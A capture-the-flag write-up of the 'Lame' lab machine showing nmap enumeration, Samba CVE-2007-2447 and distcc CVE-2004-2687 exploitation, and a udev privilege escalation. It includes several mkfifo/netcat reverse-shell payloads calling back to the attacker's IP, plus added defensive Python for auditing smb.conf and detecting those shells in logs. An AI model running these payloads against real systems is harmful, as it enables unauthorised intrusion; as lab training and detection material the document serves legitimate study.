# Lame Writeup

![](/files/-Ma_yMFbKKZ6Y3KWs7C7)

## Reconnaissance

Initial Nmap scan to find open ports, treating all hosts as online (**-Pn**):

```bash
nmap -Pn 10.10.10.3
```

![](/files/-Ma_rYgPqobF40rZ4opR)

Nmap scan on all ports (including UDP), so that we do not miss any ports that did not show up in the initial scan.

![](/files/-Maa319dfLIkWpUwm8r4)

Nmap scan for service versions (**-sV**), running the default nmap scripts (**-sC**), against ports 21, 22, 139 and 445 (**-p**), saving the output into a file called nmap (**-oN**):

```bash
nmap -sC -sV -p 21,22,139,445 -oN nmap 10.10.10.3
```

![](/files/-Ma_sK_RX-cHWukzXoQV)

## Enumeration

#### Port 21: FTP; vsftpd 2.3.4

The first thing to do is to search for this version on Google and look for known exploits.

![](/files/-Maa22dwpa7ASySErItQ)

The first link is a Metasploit tutorial on how to exploit it, but we are doing this without Metasploit, so let's click the second link.

![](/files/-Maa2aC1v73JyXu01Cfo)

Now we can either copy this exploit from the browser, or look it up with searchsploit and copy it into our working directory from there.

```bash
searchsploit vsftpd 2.3.4
```

![](/files/-Maa3gdVgQhEqbI-5xza)

Now let's copy the exploit to our directory:

```bash
searchsploit -m unix/remote/49757.py
```

![](/files/-Maa44FyMOPvZSUF4sg0)

I tried exploiting this using the python exploit we found, but it constantly showed a time out error, which means that the exploit is probably outdated and does not work anymore.

![](/files/-Maa74u4oxiJOrmoGrkI)

The next thing to do is to enumerate the anonymous FTP login that our nmap scan reported as allowed.

![](/files/-Maa6uJDAHqqPoYny6_v)

Let us log in:

Username: anonymous

Password: anonymous

![](/files/-Maa7Gvsy0dcU7w43zy5)

Let's list what the FTP server contains:

![](/files/-Maa7af_KZtErhlkNeb1)

and... nothing. Well, at least we tried. 😉

#### Port 22: OpenSSH 4.7p1

Searching on Google does not turn up anything interesting. Usually we cannot exploit port 22 directly; we only use it to SSH into the machine after we find a username and password through other ports, or if we find an id\_rsa file.

#### Ports 139 and 445: Samba

Ports 139 and 445 are Samba (SMB) ports, and they are often where exploitable services turn up, so let us enumerate them.

**smbclient** is a very common tool for enumerating SMB, so let us use it to see what the server offers.

```bash
smbclient -L 10.10.10.3 # "-L" lists what services are available 
```

![](/files/-Maa92OHOrkgtUMav2k4)

Now let us look at the permissions on the shares using smbmap (**-H** takes the target host):

```bash
smbmap -H 10.10.10.3
```

![](/files/-MaaYC7LvLx_bzoh0vYh)

Looking at this, we can see that we have read and write permissions on the tmp share on the SMB server. Let's look for vulnerabilities in this version, in particular code execution ones, since we have write permissions on a share.

After searching for a while I found an exploit that looks like the one we want: [CVE-2007-2447](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2447)

![](/files/-MaabXm98Y26QRu_qihD)

![](/files/-Maac8Xrm7IiRqA3tKVQ)

Reading through the exploit, we learn that we are able to execute arbitrary commands via shell metacharacters. Let's look it up on [exploit-db](https://www.exploit-db.com/exploits/16320) and read the code.

```ruby
username = "/=`nohup " + payload.encoded + "`"
```

This line tells us that whatever we put in the "payload.encoded" position is executed, so we can try a simple Netcat reverse shell as the payload and get a shell back.
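The weakness behind CVE-2007-2447 is a Samba configuration directive, `username map script`, that hands the supplied username to an external script, and the guest-writable tmp share is the other misconfiguration we found above. As an added example (not code from the writeup), here is a small Python checker that audits an smb.conf for both issues; the two configurations inside it are constructed for illustration, and the map-script path is a placeholder.

```python
"""Audit a Samba smb.conf for the two weaknesses seen on this box.

Added example (not from the writeup): flags
  * a 'username map script' directive in [global] (root cause of
    CVE-2007-2447 on Samba 3.0.20 through 3.0.25rc3), and
  * shares that guest/anonymous users can write to.
Both configs below are constructed; the script path is a placeholder.
"""
import re

# Constructed weak config: the kind of setup that makes the SMB attack
# in the writeup work (placeholder script path, guest-writable tmp share).
WEAK_CONF = """
[global]
   workgroup = WORKGROUP
   security = user
   username map script = /etc/samba/scripts/map-user.sh

[tmp]
   path = /tmp
   writable = yes
   guest ok = yes
"""

# Constructed hardened config: no map script, share read-only, no guests.
HARDENED_CONF = """
[global]
   workgroup = WORKGROUP
   security = user
   map to guest = Never

[tmp]
   path = /tmp
   read only = yes
   guest ok = no
"""

_TRUE = {"yes", "true", "1"}


def parse_smb_conf(text):
    """Parse smb.conf into {section: {key: value}}.

    Samba keys are case-insensitive and may contain spaces; lines starting
    with '#' or ';' are comments. Later duplicates overwrite earlier ones.
    """
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(("#", ";")):
            continue
        m = re.match(r"\[(.+)\]$", line)
        if m:
            current = m.group(1).strip().lower()
            sections.setdefault(current, {})
            continue
        if current is None or "=" not in line:
            continue
        key, value = line.split("=", 1)
        sections[current][key.strip().lower()] = value.strip().lower()
    return sections


def _is_writable(share):
    # 'writable'/'writeable' are synonyms for the inverse of 'read only'.
    if "read only" in share:
        return share["read only"] not in _TRUE
    for k in ("writable", "writeable"):
        if k in share:
            return share[k] in _TRUE
    return False  # Samba's default is read only = yes


def _guest_ok(share, global_):
    for k in ("guest ok", "public"):
        if k in share:
            return share[k] in _TRUE
    return global_.get("guest ok", "no") in _TRUE


def audit_smb_conf(text):
    """Return a list of (severity, message) findings for an smb.conf text."""
    conf = parse_smb_conf(text)
    global_ = conf.get("global", {})
    findings = []
    if global_.get("username map script"):
        findings.append(("high",
                         "username map script is set; on Samba 3.0.20-3.0.25rc3 "
                         "this is CVE-2007-2447 (command execution via the username)"))
    for name, share in conf.items():
        if name in ("global", "homes", "printers"):
            continue
        if _is_writable(share) and _guest_ok(share, global_):
            findings.append(("medium",
                             f"share [{name}] is writable by guest/anonymous users"))
    return findings


if __name__ == "__main__":
    for label, conf in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(f"== {label} ==")
        for sev, msg in audit_smb_conf(conf) or [("info", "no findings")]:
            print(f"  [{sev}] {msg}")
```

Run against a real `/etc/samba/smb.conf` by reading the file into `audit_smb_conf`; the fix for the high finding is removing the directive (or upgrading Samba), and the fix for the medium one is `read only = yes` or `guest ok = no` on the share, as the hardened config shows.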

#### Port 3632: distcc v1

Let us go to Google and try to find some information on this.

Google says that this service is vulnerable to a [remote code execution vulnerability](https://gist.github.com/DarkCoderSc/4dbf6229a93e75c3bdf6b467e67a9855), and that there is an nmap script that will give us more information.

![](/files/-MaafBO0ZKsb8eMVU_1w)

## Exploitation

### Samba

Let's start a Netcat listener on our machine:

```bash
nc -nvlp 1234
```

![](/files/-MaaflqsmBfnXu6mt4Yh)

Now let us connect with smbclient to the SMB server we enumerated earlier:

```bash
smbclient //10.10.10.3/tmp # smbclient needs //server/share; tmp is the share we found
```

![](/files/-MaaftkP3ECGD0kJikwC)

Now we have to send the shell metacharacters, wrapped around a reverse shell payload, as the username, so that the server connects back to our listener.

We can find a good reverse shell on [pentestmonkey's reverse shell cheat sheet](http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet). Replace the IP with yours; you can find your IP with this command:

```bash
ifconfig
```

It is the number next to inet under tun0 (make sure you are connected to the VPN).

Now let us put our payload in the username parameter:

```bash
logon "/=`nohup rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.19 1234 >/tmp/f -e /bin/sh`"
```

"logon" is the smbclient command used to log in as a user, so the string we pass here is what reaches the vulnerable username handling.

After pressing Enter, you should get a connection back on your Netcat listener.

![](/files/-Maaj4hJn6vxH5J8ncti)

And we are root :). Go get both flags.

### Distcc

In the enumeration part we found out that the service is vulnerable to [CVE-2004-2687](https://www.exploit-db.com/exploits/9915), and we found an [nmap script](https://nmap.org/nsedoc/scripts/distcc-cve2004-2687.html) that can be used to exploit this vulnerability.

```bash
nmap -p 3632 10.10.10.3 --script distcc-exec --script-args="distcc-exec.cmd='id'"
```

This is the nmap command as documented; instead of 'id', we can run a reverse shell payload through it.

```bash
nmap -p 3632 10.10.10.3 --script distcc-exec --script-args="distcc-exec.cmd='rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.13.8.64 1234 >/tmp/f -e /bin/sh'"
```

Let's start a Netcat listener and wait for a connection after entering this command.

![](/files/-Maao60wQ3PUFPjFuyrc)

![](/files/-MaaoOg1cKeay8BbUNcT)

And we get a reverse shell, but only as a low-privileged user :/. Time to escalate privileges and get root.

Let's look at the kernel and OS version and search for exploits:

```bash
uname -a
```

![](/files/-MaaonoqdvGx9e3XdHvZ)

After a lot of searching I found an [exploit](https://www.exploit-db.com/exploits/8572) that might work, let's copy it from searchsploit.

![](/files/-MaaqxocYeNhbC1XI7AR)

Now we have to transfer it to the victim machine. We can do this by starting a Python HTTP server on our machine and using "wget" on the victim to fetch the file.

![](/files/-MaarNSwuZjeRyDJSG30)

![](/files/-MaarcVnG8gqRHckLhAS)

We can see that it transferred successfully. Now we have to compile the .c file with gcc, naming the output binary exploit:

```bash
gcc 8572.c -o exploit
```

Now we have to run it. To do this, we have to follow the instructions in the header of the exploit we found.

![](/files/-MaasZ3Qup--AhM3y70Q)

First we have to find the PID of the udevd netlink socket, which we can do with this command:

```bash
ps -aux | grep devd
```

![](/files/-MaatFT6i0p9jo2Jlk6H)

Now we have to subtract one from that PID, which gives 2740.

Next we have to create a file called run in the /tmp folder and put our payload in it, which will be our reverse shell.

First we need to add

```bash
#!/bin/bash
```

to the file, so that the system recognizes it as a bash script:

```bash
# the exploit looks for the file at /tmp/run, so write it there
echo '#!/bin/bash' > /tmp/run
echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.19 1234 >/tmp/f' >> /tmp/run
```

![](/files/-MaawMHA90ciwz6YxFqm)

After this, start a listener on your machine and run the exploit with the PID minus one as its argument:

```bash
./exploit 2740
```

After this you should have root :)

![](/files/-MaaxROULFOzY6WrDy-P)
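The same mkfifo/nc reverse shell is delivered three times in this writeup: through smbd (CVE-2007-2447), through distccd (CVE-2004-2687) and through udevd via /tmp/run. From the defender's side, all three look alike in process telemetry: a daemon that should never spawn a shell suddenly does, and the command line carries the mkfifo, `sh -i` and nc pieces together. As an added example (not code from the writeup), here is a Python detector that runs over a constructed, simplified process-execution log; the log format and every sample line are constructed, and you would adapt `parse_line` to auditd EXECVE records or your EDR's telemetry.

```python
"""Detect the reverse-shell pattern used throughout this writeup in
process-execution logs.

Added example, not part of the writeup. It assumes a constructed log
format (one process start per line, key=value fields, quoted command
line); adapt parse_line() to your real telemetry. The sample lines are
constructed, not captured from the box.
"""
import re

# Constructed sample telemetry. Lines 2-4 mirror the three payload
# deliveries in the writeup: via smbd, via distccd and via udevd.
SAMPLE_LOG = """\
ts=2024-05-01T10:00:01Z host=lame parent=sshd user=makis cmd="bash -l"
ts=2024-05-01T10:00:07Z host=lame parent=smbd user=root cmd="/bin/sh -c rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.5 1234 >/tmp/f"
ts=2024-05-01T10:02:13Z host=lame parent=distccd user=daemon cmd="sh -c rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.5 1234 >/tmp/f"
ts=2024-05-01T10:05:40Z host=lame parent=udevd user=root cmd="/tmp/run"
ts=2024-05-01T10:06:00Z host=lame parent=cron user=root cmd="/usr/bin/find /tmp -mtime +7 -delete"
ts=2024-05-01T10:06:30Z host=lame parent=distccd user=daemon cmd="cc -c main.c -o main.o"
"""

LINE_RE = re.compile(r'ts=(?P<ts>\S+) host=(?P<host>\S+) parent=(?P<parent>\S+) '
                     r'user=(?P<user>\S+) cmd="(?P<cmd>.*)"$')

# Indicators that together make up the mkfifo/nc reverse shell; each one
# alone can be benign, two or more together are not.
REVSHELL_INDICATORS = (
    re.compile(r"\bmkfifo\b"),
    re.compile(r"/bin/(ba)?sh\s+-i\b"),
    re.compile(r"\b(nc|ncat|netcat)\b\s+\S+\s+\d+"),
)
# nc with -e /bin/sh is a reverse shell on its own.
NC_EXEC = re.compile(r"\b(nc|ncat|netcat)\b.*\s-e\s+/bin/(ba)?sh")

# Daemons that should never be the parent of an interactive shell or of
# a file executed from /tmp (the three entry points used on this box).
SENSITIVE_PARENTS = {"smbd", "distccd", "udevd"}
SHELLS = {"sh", "bash", "dash", "/bin/sh", "/bin/bash", "/bin/dash"}


def parse_line(line):
    """Return the event as a dict, or None if the line is not in our format."""
    m = LINE_RE.match(line.strip())
    return m.groupdict() if m else None


def classify(event):
    """Return a list of reasons an event is suspicious (empty = benign)."""
    cmd, parent = event["cmd"], event["parent"]
    reasons = []
    hits = sum(1 for rx in REVSHELL_INDICATORS if rx.search(cmd))
    if hits >= 2 or NC_EXEC.search(cmd):
        reasons.append("reverse-shell pattern (mkfifo/sh -i/nc)")
    words = cmd.split()
    argv0 = words[0] if words else ""
    if parent in SENSITIVE_PARENTS:
        if argv0 in SHELLS:
            reasons.append(f"{parent} spawned a shell")
        elif argv0.startswith("/tmp/"):
            reasons.append(f"{parent} executed a file from /tmp")
    return reasons


def scan(log_text):
    """Return [(event, reasons)] for every suspicious line in log_text."""
    alerts = []
    for line in log_text.splitlines():
        event = parse_line(line)
        if event is None:
            continue
        reasons = classify(event)
        if reasons:
            alerts.append((event, reasons))
    return alerts


if __name__ == "__main__":
    for event, reasons in scan(SAMPLE_LOG):
        print(f"{event['ts']} parent={event['parent']}: {'; '.join(reasons)}")
        print(f"    cmd: {event['cmd']}")
```

The benign distccd line (a real compile job) and the cron cleanup job are not flagged, which is the point of requiring two indicators or a sensitive parent plus a shell rather than alerting on `nc` or `/tmp` alone.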


